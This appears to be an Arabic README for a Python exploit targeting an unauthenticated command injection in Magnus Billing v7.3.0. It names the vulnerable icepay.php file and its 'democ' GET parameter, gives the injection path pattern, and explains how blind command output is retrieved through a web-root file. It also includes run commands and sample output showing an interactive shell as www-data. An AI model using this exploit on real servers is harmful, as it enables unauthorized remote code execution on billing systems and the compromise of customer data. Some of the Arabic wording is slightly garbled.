
ثغرة حقن أوامر دون مصادقة في Magnus Billing الإصدار v7.3.0.
ثغرة حقن أوامر غير مصادق عليها في Magnus Billing v7.3.0. يتم تمرير معامل GET
democفيicepay.phpمباشرةً إلى دالة شل دون تنقية، مما يسمح بتنفيذ أوامر عشوائية كمستخدم خادم الويب. الحقن أعمى — لا ينعكس المخرجات في استجابة HTTP — لذلك يقوم هذا الاستغلال بتوجيه مخرجات كل أمر إلى ملف في الجذر الوبائي ثم جلبها مرة أخرى عبر HTTP.
/mbilling/lib/icepay/icepay.php?democ=;<command>;.out.txt).إذا كان الهدف يستخدم مسار جذر وبائي مختلف، قم بتعديل
OUTPUT_FILEفي أعلى النص البرمجي.
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
مثال:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data